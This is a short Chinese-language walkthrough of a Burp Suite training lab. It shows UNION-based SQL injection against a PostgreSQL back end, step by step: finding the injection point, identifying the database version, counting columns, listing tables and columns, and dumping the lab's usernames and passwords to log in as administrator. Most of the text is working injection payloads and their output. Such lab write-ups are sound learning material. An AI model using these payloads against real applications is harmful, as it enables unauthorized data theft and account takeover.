burpsuite靶场----SQL注入5----非oracle数据库注入出敏感数据
靶场地址
避坑
1.发现不能用%23作为注释符 ' union select 'a','b'%23会报错
2.发现不能用数字进行联合注入 ' union select 1,2-- 也会报错
3.经过测试发现PostgreSQL注入过程与Mysql注入过程的细微差别
PostgreSQL注入没有利用database(),PostgreSQL注入也没有利用上group_concat()
正式开始
1.确定存在注入点
' or 1=1--
' or 1=2--
2.判断数据库类型
' union select 'a',version()--
3.确定列数
' order by 1--没有报错 ' order by 2--没有报错 ' order by 3--报错了
2308/3254245-20230815115119909-827062295.png)
4.注入出表名
' union select 'a',table_name from information_schema.tables--
5.经过全局搜索uers发现密码可能在这个表内 users_lgvwxu
' union select 'a',column_name from information_schema.columns where table_name='users_lgvwxu'--
6.继续探索
' union select username_uwpxnb,password_egixuj from users_lgvwxu--
administrator
ucgaacxc6j6g196snqvp
carlos
hd9bxebslulnedbl1pwj
wiener
exqzpxnuxi7rl48cg74a
7.点击my account登录
成功